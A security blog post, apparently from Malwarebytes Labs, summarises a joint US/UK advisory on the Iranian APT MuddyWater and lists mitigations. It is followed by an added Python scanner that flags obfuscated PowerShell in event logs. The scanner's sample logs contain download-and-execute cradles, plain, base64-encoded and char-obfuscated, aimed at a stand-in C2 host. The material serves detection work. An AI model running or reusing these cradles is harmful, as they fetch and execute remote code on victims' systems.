CISA warns of cyberespionage by Iranian APT “MuddyWater”


Cybersecurity agencies in the US and UK have issued a joint [cybersecurity advisory (CSA)](<https://www.cisa.gov/uscert/ncas/alerts/aa22-055a>) on MuddyWater, a government-sponsored Iranian advanced persistent threat (APT) actor. The Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), the US Cyber Command Cyber National Mission Force (CNMF), and the National Security Agency (NSA), together with the UK's National Cyber Security Centre (NCSC), have detailed operations by this APT against a range of governments and private organizations around the world. MuddyWater, also known as Earth Vetala, MERCURY, Seedworm, Static Kitten, and TEMP.Zargos, has its eyes set on the telecommunications, defense, local government, and oil and natural gas sectors—among others—in Africa, Asia, Europe, and North America.

> Even as we remain laser-focused on Russian malicious cyber activity, we cannot fail to see around the corners. Our latest advisory provides details on Iranian government-sponsored APT actors known as MuddyWater: <https://t.co/sgWJ8jRbTZ> [#ShieldsUp](<https://twitter.com/hashtag/ShieldsUp?src=hash&ref_src=twsrc%5Etfw>) [pic.twitter.com/TwjTvkxWlE](<https://t.co/TwjTvkxWlE>)
>
> -- Jen Easterly (@CISAJen) [February 24, 2022](<https://twitter.com/CISAJen/status/1496894349803769860?ref_src=twsrc%5Etfw>)

"MuddyWater is a subordinate element within the Iranian Ministry of Intelligence and Security (MOIS)," the advisory briefs its readers. "This APT group has conducted broad cyber campaigns in support of MOIS objectives since approximately 2018. MuddyWater actors are positioned both to provide stolen data and accesses to the Iranian government and to share these with other malicious cyber actors."

"MuddyWater actors are known to exploit publicly reported vulnerabilities and use open-source tools and strategies to gain access to sensitive data on victims' systems and deploy ransomware. These actors also maintain persistence on victim networks via tactics such as side-loading dynamic link libraries (DLLs)—to trick legitimate programs into running malware—and obfuscating PowerShell scripts to hide command and control (C2) functions."

The full advisory can be read on _[this CISA web page](<https://www.cisa.gov/uscert/ncas/alerts/aa22-055a>)_. It can also be downloaded as a _[PDF file](<https://www.ic3.gov/Media/News/2022/220224.pdf>)_.

The advisory lastly reminds readers to take mitigating steps to protect themselves from malicious MuddyWater campaigns. Ensure that software is patched, prioritizing applications and operating systems with _[known, exploitable vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)_. Back it up with [an effective antivirus solution](<https://www.malwarebytes.com/pricing>), EDR and SIEM. Use _[multifactor authentication (MFA)](<https://blog.malwarebytes.com/glossary/multi-factor-authentication-mfa/>)_ wherever you can. Limit access to resources according to the [principle of least privilege](<https://en.wikipedia.org/wiki/Principle_of_least_privilege>). Lastly, ensure that employees are trained to be alert for suspicious emails or social media posts—they could be the start of a phishing attack.

The post [CISA warns of cyberespionage by Iranian APT "MuddyWater"](<https://blog.malwarebytes.com/awareness/2022/02/cisa-warns-of-cyberespionage-by-iranian-apt-muddywater/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).
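The advisory's point that the group obfuscates PowerShell to hide C2 functions is exactly the kind of behaviour that script block logging (Windows event 4104) plus a SIEM rule can surface. The following is an added example, not code from CISA, the NCSC or Malwarebytes: a small heuristic scanner that scores PowerShell script-block log lines for common obfuscation and download-cradle indicators, decoding `-EncodedCommand` payloads so the hidden content is scored too. The log lines are constructed, and the indicator weights and the alert threshold are assumptions a defender would tune against their own baseline.

```python
"""Heuristic review of PowerShell script-block log lines for obfuscation indicators.

Added illustration; not code from the advisory or the blog. The sample log lines
below are constructed, and INDICATOR weights and ALERT_THRESHOLD are assumed values.
"""
import base64
import re
from typing import Dict, List

# Pattern for an -EncodedCommand style argument carrying a base64 blob.
ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:e|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})")

# (name, compiled regex, weight). Weights are assumptions, not published scoring.
INDICATORS = [
    ("encoded_command", ENC_RE, 3),
    ("base64_decode", re.compile(r"(?i)FromBase64String"), 2),
    ("invoke_expression", re.compile(r"(?i)\b(?:Invoke-Expression|IEX)\b"), 2),
    ("char_reassembly", re.compile(r"(?i)\[char\]\s*\d+"), 2),
    ("join_or_replace_tricks", re.compile(r"(?i)-join\s*''|-replace\s+'[^']+'\s*,"), 1),
    ("download_cradle", re.compile(r"(?i)(?:Net\.WebClient|DownloadString|Invoke-WebRequest|iwr)\b"), 2),
    ("hidden_window", re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"), 1),
    ("backtick_noise", re.compile(r"`\w"), 1),
]
ALERT_THRESHOLD = 4  # assumed; tune against your own baseline of benign scripts


def decode_encoded_command(line: str) -> str:
    """Return the UTF-16LE text behind an -EncodedCommand argument, or '' if none/invalid."""
    m = ENC_RE.search(line)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le", errors="ignore")
    except ValueError:  # binascii.Error is a ValueError subclass
        return ""


def symbol_ratio(text: str) -> float:
    """Share of characters that are neither alphanumeric nor whitespace."""
    if not text:
        return 0.0
    return sum(1 for c in text if not (c.isalnum() or c.isspace())) / len(text)


def score_line(line: str) -> Dict[str, object]:
    """Score one script-block line; the decoded payload (if any) is scanned as well."""
    hits: List[str] = []
    score = 0
    decoded = decode_encoded_command(line)
    for text in (line, decoded):
        for name, pattern, weight in INDICATORS:
            if text and name not in hits and pattern.search(text):
                hits.append(name)
                score += weight
    # Heavy punctuation density is a weak signal of string-mangling obfuscation.
    if symbol_ratio(line) > 0.35:
        hits.append("high_symbol_density")
        score += 1
    return {"score": score, "hits": hits, "decoded": decoded,
            "suspicious": score >= ALERT_THRESHOLD}


def scan(lines: List[str]) -> List[Dict[str, object]]:
    return [score_line(line) for line in lines]


# Constructed sample input (not real telemetry). The cradle uses a reserved
# .invalid domain and is encoded here the way -EncodedCommand expects it.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/s')"
ENCODED = base64.b64encode(CRADLE.encode("utf-16-le")).decode("ascii")
SAMPLE_LOG = [
    "4104 ScriptBlockText: Get-ChildItem -Path C:\\Users\\alice\\Documents -Recurse | Measure-Object",
    "4104 ScriptBlockText: powershell.exe -nop -w hidden -enc " + ENCODED,
    "4104 ScriptBlockText: $f = [char]73 + [char]69 + [char]88; "
    "$u = ('http://c2','.example','.invalid') -join ''; & $f (iwr $u)",
    "4104 ScriptBlockText: Get-Service | Where-Object { $_.Status -eq 'Running' }",
]

if __name__ == "__main__":
    for line, result in zip(SAMPLE_LOG, scan(SAMPLE_LOG)):
        flag = "ALERT " if result["suspicious"] else "ok    "
        print(f"{flag} score={result['score']:<2} hits={result['hits']}  {line[:70]}")
        if result["decoded"]:
            print(f"       decoded: {result['decoded']}")
```

The encoded line is the important case: on its own it shows only a hidden window and an opaque blob, but once the blob is decoded the download cradle and `IEX` are visible and push the score over the threshold. A production rule would add an allow-list for known administrative scripts and feed the decoded text into the same pipeline as plain script blocks.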